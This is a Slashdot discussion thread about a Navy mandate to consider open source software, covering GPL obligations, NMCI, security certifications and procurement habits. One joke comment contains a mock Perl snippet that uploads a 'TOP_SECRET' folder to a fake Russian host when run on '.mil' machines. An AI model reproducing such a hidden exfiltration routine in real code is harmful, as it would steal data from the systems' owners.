Navy Now Mandated To Consider FOSS As an Option 205
lisah writes "In a memorandum handed down from Department of the Navy CIO John Carey this week, the Navy is now mandated to consider open source solutions when making new software acquisitions. According John Weathersby, executive director of the Open Source Software Institute, this is the first in a series of documents that will also address 'development and distribution issues regarding open source within Navy IT environments.'"
Cool!! (Score:4, Insightful)
Re: (Score:2)
Re:Cool!! (Score:5, Informative)
Of interest would be the clause about internal use - if one government agency modifies it can any other use it without requiring a broader release of the source? On theory the DON, as longs the program stays within the US Government, would be under no obligation to release any modifications since they have not distributed it; all they have done is install and run it on machines owned by them.
COTS = (Score:2, Informative)
Re:Cool!! (Score:4, Interesting)
No, this would not require a broader source release. Contrary to common belief, the GPL does not require that source must be published to the world when software covered by the GPL is distributed, only that the source is distributed along with the binary under the GPL. The recipient is free to publish though, so there is usually not much to gain by only distributing to your customers.
Re: (Score:2, Insightful)
I would hope that a situation could be worked out so that the code can be protected as classified in certain cases, and I would say there is a partial conflict at
Re: (Score:2)
Just properly rewrite your phrase and let's see:
"But if someone illegally distribute the code (that's a "leak", isn't it?), is it then legal to distribute?"
See?
Re:Imagine Chinese say: GPL shows us your code NAV (Score:3, Funny)
Were you summarizing your comment?
Re:Imagine Chinese say: GPL shows us your code NAV (Score:2)
Re: (Score:2)
That's the NRL. (Score:2)
But a lot of the operations parts of the Navy is a MS infrastructure.
OTH you'll see Unix-likes and other estoeric stuff in some command/control situations and deployed systems but that's not the same thing.
Inconceivable! (Score:5, Funny)
I am speechless.
Re: (Score:2)
I just can't imagine a military where they routinely depend on software that is geared toward Grandma where they should be using special purpose code.
Too much money getting kicked around with ve
Re: (Score:3, Interesting)
Re: (Score:2)
to mission critical systems.
Re: (Score:2)
Re:Inconceivable! (Score:5, Funny)
if ($hostname =~ m/.*\.mil/) {
multiPartUpload("C:\\TOP_SECRET\\", "http://post.secrets.ru?param=suckers");
explode() || die("The requested operation cannot be performed");
}
Re: (Score:2, Insightful)
The Navy is NOT going to just download crap, have a monkey install it, and hope for the best. At the minimum, they will need to buy support contracts. Additionally, they will most likely hire some support staff of their own. There will likely be little cost savings in actual dollar amounts.
The OTHER advantag
Re: (Score:2)
Well, with the Sun and Oracle stuff....I'll grant you they DO get good service. However, I've never seen any type of 'support' for windows...which is quite prevalent in the NMCI system for instance.
For doing your own support, as with win-boxes...you would indeed save $$ on licensing, replacing much of that with Linux, and other F
Re: (Score:2)
Re: (Score:3, Informative)
Sun, IBM, Novell, Oracle, Red Hat, UTS, SCO, HP, etc, etc, etc...
Re: (Score:2)
Yeah, well they still offer Linux consulting services.
And since I suspect the parent poster was more interested in spreading FUD than furthering the discussion, they might be a good match for him/her.
Sing with me (Score:5, Funny)
Yes, you can sail the gcc's
In the navy
Yes, you can open source with ease
In the navy
Come on now, people, make && make install
In the navy, in the navy
Re:Sing with me (Score:5, Funny)
I was going to say that you've painted yourself mauve, or possibly chartreuse.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Nice chorus, but the orignial is well suited. (Score:3, Funny)
Finish your chorus with this and then fall back to the original lyrics [oldielyrics.com]:
They want GNU
They want GNU
They want you as a GNU recruit
The original Lyrics:
Repaint, thou thinner (Score:2)
Re: (Score:2)
Corner? Don't you mean closet?
--jeffk++
Strategy for getting M$ price concessions (Score:3, Insightful)
Re: (Score:2)
(They can't switch of Microsoft easily, anyway, as they switched to a pure Microsoft solution for application serving, security and externally-visible connections. This was back in 2
consider (Score:2)
Finally! (Score:5, Funny)
Re:Finally! An F-22 Problem? (Score:3, Interesting)
What happens when it crosses the International Dateline? [defenseindustrydaily.com]
Re: (Score:2)
I doubt *any* flight control system works on the local time of the location being overflown, but on Zulu (UTC) or on the local time of the point of origin.
What's lost in this is that the Dateline is also longitude +/- 180. I'd argue that the NAV system software probably choked on the sign change of longitude.
Re: (Score:2)
Re: (Score:2)
A retired Major General Don Sheppard had more to say on CNN [cnn.com], but gave no details about where his information came from. Although one is pre
Re: (Score:2)
Re: (Score:3, Funny)
come on (Score:2)
Oh, come on. Every nuclear sub manufacturer/terrorist I know gives their nuclear subs Depend® submarine undergarments for those inevitable incontinent moments.
Whether your subs have crappy open-source code or Windows 3.1, you can get all you want out of disastrous global thermonuclear war(TM) with Depend®!
This could get ugly (Score:2)
Next thing you know, they're going to start messing with the coffee -- it ain't gonna be pretty.
[1] OK, probably since George Washington's quartermaster. When he was in his 20s. Certainly since the people who supplied the Army of the Republic in the Civil Wa
Comment removed (Score:3, Insightful)
Re: (Score:2)
Great! This is what you have to do (Score:5, Insightful)
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
My opinion is that the DoD should buy multiple systems so that we aren't running on one s
Re:Great! This is what you have to do (Score:5, Interesting)
When you consider that you can build role-based access controls that can migrate with applications across clusters, when network connection types, network bandwidth, shared memory and inter-process communication have mandatory access controls, you really begin to see just how pathetically limited generally-available OS' really are. There's no reason for it - there's nothing that prevents a widely-available system from being harder than a diamond-encrusted pulsar.
The reason that nobody bothers much with making OS' secure is that the DoD has long-proved (by buying Windows and by failing their security audits) that security doesn't matter enough to be worth the effort. Security to this level costs big money, and only the really big corporations can afford the costs or have the market to pay for it. Companies can lose hundreds of thousands of credit cards and maybe get rapped knuckles - if they're even discovered. Only one State requires reporting - but plenty of other places have e-Commerce. System crackers - black hats especially - are a pervasive part of society with no serious effort to secure networks against them.
If the money did exist, if there was serious interest in serious prevention, host intrusion detection wouldn't be MD5 checksums (which were beaten soundly, according to the Internet Auditing Project). Plain-text passwords wouldn't exist. One-time pads and public-key encryption would be the only way to log onto Slashdot or any other web service. Zombies, Trojans and Viruses would be found in technology museums, under "extinct electronic lifeforms". If a disk drive with tens of millions of credit cards or social security numbers went missing, in a secure world that would be cause for a few minutes downtime to replace what was lost, rather than a few weeks or months of running round in circles doing nothing.
You see any of that happening? No? Then security is still regarded as an optional extra, not as a fundamental design requirement, and will never reach its true potential. Furthermore, agencies will continue buying/copying OS' based on ease of initial deployment and not on whether it'll protect the data sufficiently.
Re: (Score:2)
Re:Great! This is what you have to do (Score:5, Informative)
Although NT4 was certainly used for secret material, I am pretty sure that only B-rated operating systems were entitled to hold secret and some top secret information. A-rated systems could be used for anything. Only one truly general-purpose A-rated OS (Genesis) was ever developed and officially rated - many other A-rated OS' existed, but they were all special-purpose. C-rated systems were only supposed to be used for unclassified and commercially sensitive material, if I remember the system correctly.
Trusted Solaris was rated B1, which meant it was as good as you could get without some very stringent formal proofs of correctness and formal design methodologies. The big difference between B1 and A1 is that a B1 system is bulletproof only according to any tests and evaluations performed on it, but the tests aren't guaranteed comprehensive. With an A1 system, you also know that the implementation exactly matches the design and that there is no obvious flaw in the design.
However, the criteria have shifted over time. Under the Common Criteria, Trusted Solaris and Solaris 9 "only" rate EAL-4+ (out of a maximum of 7), with PR/SM and XTS-400 being the only ones to rate 5. Bear in mind that RHEL4 update 1 is also classed as 4+, as are Windows Server 2003 and Windows XP. The difference in security between Windows 2003 and Trusted Solaris is so vast as to be laughable, and the idea that a highly specialized, highly secure system like XTS-400 is less than a single unit of trustworthiness better than XP is a complete joke. Clearly the method used in the Common Criteria is flawed to the point of not being useful as a measure of trust.
Mind you, the Orange Book was not perfect. Trusted Irix was rated B3, MULTIX was rated B2. The Multicians (a group of surviving kernel developers for MULTICS) let me know that there was no API, but you can't test if the API works if there is no API to test against. This makes testing for code safety difficult at best - you've nothing to tell you what's meant by safe. I'm prepared to believe MULTIX was brilliant, in fact I do believe that, but I have a hard time believing that the level of trust you could place in it was somewhere between that of Trusted Irix and Trusted Solaris. That may well be the case, but it feels more likely somehow that the evaluation criteria are too narrow and too minimalistic.
(I'd develop my own criteria, but having friends and karma on Slashdot doesn't equate to being taken more seriously by industrial leaders on security issues than defense industry specialists. In fact, even being on Slashdot is probably a big minus in the eyes of places like BAE or Sun Microsystems. Which, of course, is stupid - everyone here knows Slashdot readers are the creme a-la creme of the industry.)
NSA trusted computing (Score:3, Informative)
What law require(s|ed) evaluation according to the NSA "rainbow books" before a system can be used for government work? Where I work, even systems which process Classified information are not required to have trusted system software. You have to protect the system, but that's most often accomplished by far less sophisticated means. It is what is called "system high" or "dedicat
Re:Great! This is what you have to do (Score:5, Informative)
Re: (Score:2)
Re: (Score:2)
and i suppose it did not occur to you that there is a very good reason WHY closed source is not used extensively in defence? who wrote that code? did you audit every single line?
Re: (Score:2)
This kind of argument is even more applicable to any proprietary software. Try even getting the code to the typical Windows machine...
Coast Guard is doing something.... (Score:2)
Re: (Score:2)
U.S. COAST GUARD ENLISTMENT OATH
"I, (State your name), swear to sign away 4 years of my life to the UNITED STATES COAST GUARD because I know being in the real military scares me. However, I swear to defend our position as the fifth branch of the Armed Services, although at one point we were under the Department of Homeland Security. I understand that atleast twice a day, someone will refer to me a member of the Air Force or Navy,
Re: (Score:2)
> people dumber then rocks, and then be heckled by the same
> people when I bust them for transporting drugs two months later.
If only it had been that exciting! I spent my CG career checking EPIRBs, counting rockfish, and filling out boarding reports. And spending money on barcode equipment no one used. Ah well. But, the gunnery exercises were fun!
Net result: very little. (Score:5, Insightful)
Judging based on my knowledge of DoD networks and computer applications, I don't believe this will have much of an effect on IT decisions in the Navy. (at the Air Force base I work at, we have some BSD, but it's running on specialized devices on a very small scale). It reminds me of how my father did equipment purchasing at the university he worked at (and I'll bet most Navy IT sections will do the same): The university had a set of requirements for big computer purchases that favored specific venders and things like low bit. By dad simply wrote the specs for what he wanted so strictly that only one product would satisfy the requirements.
Also, keep in mind that great scads of DoD IT is standardized on Microsoft networks and applications that would be difficult to integrate with OSS for a variety of reasons. And, there will always be FUD based "security" reasons that military networks will want to avoid OSS.
Net result: very little.
Re: (Score:2)
Re: (Score:2)
Are you suggesting that they would jump at the chance for a simpler, less time consuming process? I don't think so, that would mean the loss or downgrade of a manning position. It may be a pain in the ass, but it translates into someone's job.
Yeah, and the USAF uses ADA (Score:4, Interesting)
So to me the announcement means nothing. Military doesn't always eat it's own dog food.
Actions, Not Words! (Score:4, Funny)
Talk about an arrangement of words that don't mean cr@p in the real world.
Navy: Yeah we thought about it. Considered it even. Then went back to what we've been doing all along. Only terrorists use FOSS. Microsoft told us so.
For security purposes perhaps. (Score:2)
I can see the Navy using FOSS since they can hire people to modify it to their specific needs and save money while also increasing security.
Re: (Score:2)
No surprise (Score:3, Informative)
Consider eh? (Score:2, Interesting)
Before the navy had no idea under what label they were supposed to put open source software so they didn't consider it (out of lazyness?). Now open source is defined as a commercial item so the navy can purchase it the same way they do with other software.
However this doesn't seem to in any way prevent the large companies from doing what they always do. Just bribe the officials responsible for deciding what software/hardware to use and get them to make the navy pay for their e
More paperwork? (Score:3, Informative)
A long while back I worked for USGS. We were hampered with hiring people, getting new software, hardware, etc because of all the paperwork. If we made a decision we had to consider 50 different laws and regulations. Individually, they were great ideas. Put together they were paralyzing. This is the reason we were stuck with Data General for so long, because no one wanted to do the paperwork to change vendors.
One word: NMCI (Score:2)
Re: (Score:2)
Quite correct but fortunately Firefox doesn't require Admin privileges to be installed, =)
Re: (Score:2)
Why the Navy wants FOSS (Score:4, Interesting)
Re: (Score:3, Interesting)
Re: (Score:2)
Re: (Score:3, Interesting)
N M C I (No More Computing Inhouse) (Score:3, Informative)
In the last few years the Navy has straddled us with the hideous NMCI IT contract that dictates operating systems, software applications, and hardware. When NMCI was conceived, in the womb of ignorance and shortsightedness, they were thinking of providing a common monocultural solution that might work if the only thing the Navy did was to send email and make PowerPoint presentations.
In a research environment you need flexibility in order to match solutions to problems. NMCI forbids the installation "unapproved" software or hardware. This includes software drivers and communication applications for special purpose hardware such as serial/USB/PCI devices. You cannot connect any web enabled devices like cameras, 1-wire control, power control devices, UPS devices, weather stations, data acquisitions, etc.
So what happens at the Navy Labs is there are two networks - the NMCI network and the "Legacy Network" where the work gets down.
In the spirit of reducing cost we have have to maintain two networks and two computers on each desktop and have two exposed flanks to the outside world! It is wasteful, dangerous and inefficient.
Oh did I mention NMCI is inefficient and near useless. I have a NMCI laptop. I would rather have a 286 with two floppy drives and a sharp stick. The other day I needed to access a jpeg image that was on the NMCI network and edit it with Coral Draw (the application they felt I should be using instead of the more useful, efficient and cheaper PSP). I timed the process from pushing the "On" button and loading the remote desktop, mapping the network file system, logging on, clicking thru all the various dialog windows, loading the bloated application and load the file - it took over 27 minutes.
If only it affected NMCI (Score:2)
The U.S. government's biggest gift to Microsoft since the abandoned anti-trust suit.
Yeah but... (Score:4, Funny)
Re: (Score:2)
Used all over the place already (Score:2)
Re: (Score:2)
Take out the Linux, and you're closer to the truth.
I have done DoD accreditation on both (Linux and Solaris), it is -way- tougher to get Linux accredited than Solaris.
Part of the problem is that the guidelines for accrediting Solaris are more specific and easier to implement than the Linux ones. The Solaris guidelines will give specific steps using specific tools, but
It's all about the benjamins (Score:2, Insightful)
It's a great negotiating advantage to be "forced" to consider open source.
FOSS in the Navy (Score:2, Informative)
Re: (Score:2, Informative)
Later (late 90's) I worked for a company that specializes in Air Traffic Control Systems. Development environment was Linux and production environment was AIX.
Government agencies have accepted *nix flavors for a long time. "Never going to happen" is an incredibly strong
What constitutes cosidering? (Score:2)
If it's anything like:
A: We need a new database system because the one we're using isn't supported any more
B: Should we use *Insert OSS*
A: Is it created by Oracle?
B: No
A: Then that's your answer
...then there's no hope. I'm sure there will be *some* adoption, but I doubt this new 'policy' will have any net effect.
Same thing in Canada (Score:3, Informative)
* On average, commercial, off the shelf software (COTS) tended to be slightly cheaper for life cycles in the mid-term range, which seemed to be 5-12 years or so. Shorter than that FOSS was best because of the low up-front costs, while on the longer term the lack of vendor support for COTS was a concern. The number that was thrown out was COTS being about 15% cheaper for the mid-term, although there were cases where FOSS was still better.
* To avoid finger pointing between the OS and application manufacturers during bug hunts, it was desirable for a single company/consultant group to take responsibility for all software. They weren't inclined to wait in a war zone while tech guys played telephone tag while repairing a bug. The ideal would be to purchase hardware from a given supplier, and having one contact point for all software.
* Long-term software support was a concern for both COTS and FOSS, but the ability to either maintain the software yourself (least desirable) or form a consortium with other like-minded entities was an advantage for FOSS.
* Licensing was identified as a major hassle. The speaker identified that computer types are very highly trained from a technical perspective, but not trained from a legal standpoint, so navigating through licensing conditions was a problem. They were hoping our Treasury Board could handle government-wide licensing issues.
* There was definite interest in shifting the computer systems on-board our latest warships from HP-UNIX to Linux-based systems to avoid the vendor end-of-lifing the systems.
The talk continued on to discuss issues related to hardening systems from attacks, but I didn't stay for the whole thing. Just before I left, the speaker was bemoaning that while FOSS gave great tools for the good guys, they also empowered the foreign script-kiddies as well, so it was a two-edged sword.
Meaningless dribble! (Score:2)
What is an option? What is consideration? FOSS has always been an option for the Navy. The Navy has always had the choice to consider it. Now they are forced to consider it as an option? What?
The only way to truly examine this is through a car analogy.
Say you are driving a car, and you are trying to get to Algeria. You come to a junction where you could turn off and head to Libya, or you can keep going straight and arrive in Algeria. You have the optio
Parts of the Navy are way ahead of him already (Score:2, Interesting)
Re:Is the tide turning? (Score:4, Informative)
In short, I think you are wrong.
Re: (Score:3, Funny)
"Man, this thing doesnt work"
"Uhhh, post a question on the fourm, and hope you hear back"
That is exactly why companies like IBM and RedHat exist.
Re: (Score:2)
Re: (Score:2)
But the OP's point was "I'm posting this in a random mailing list" is generally not an acceptable answer to the PHBs of this world who want someone they can point at and shout "fix it", and (while I have no direct experience) I would imagine the military is chock-full of such PHBs.
Re: (Score:2)
Spoken as someone who has never served in the Navy. The military does have greatly skilled technicians that gets brand spanking new equipment straight from the labs (where it passed all tests with flying colors) but as soon as it's installed on a ship that moves, rolls, and lists has problems. Not to mention unstable power sources and such. Speaking from personal experience
Re: (Score:3, Insightful)
Having been on the receiving end of a few military software acquisition projects in a past life, I can say that OSS reduces the possibility of being held by the balls by the vendors for ongoing support. Talk about tapping into a major artery when you sell Defense software and they want changes.
Also, commercial licensing usually doesn't fit the military all that well. You may want some software for a c
Re: (Score:2)
Re: (Score:2)
So that is how they plan to combat piracy?
Re: (Score:2)
That's what I would think... unless they're talking about office apps to run on their own closed networks.
Running general purpose software on special-purpose machines (e.g., battleships, weapons, etc.) seems like a bad solution to me.
But, then again, I have been accused of being idealistic.
Security (Score:2)
Re: (Score:3, Informative)
Also having source-code to secure systems in the public domain doesn't hurt. In fact it actively can be of benfit as the more people look at it, the more loopholes get found and fixed. PGP source code has been freely available for decades but the algorithm that the code implements is still widely understood to be one of the most secure encryption methods out there.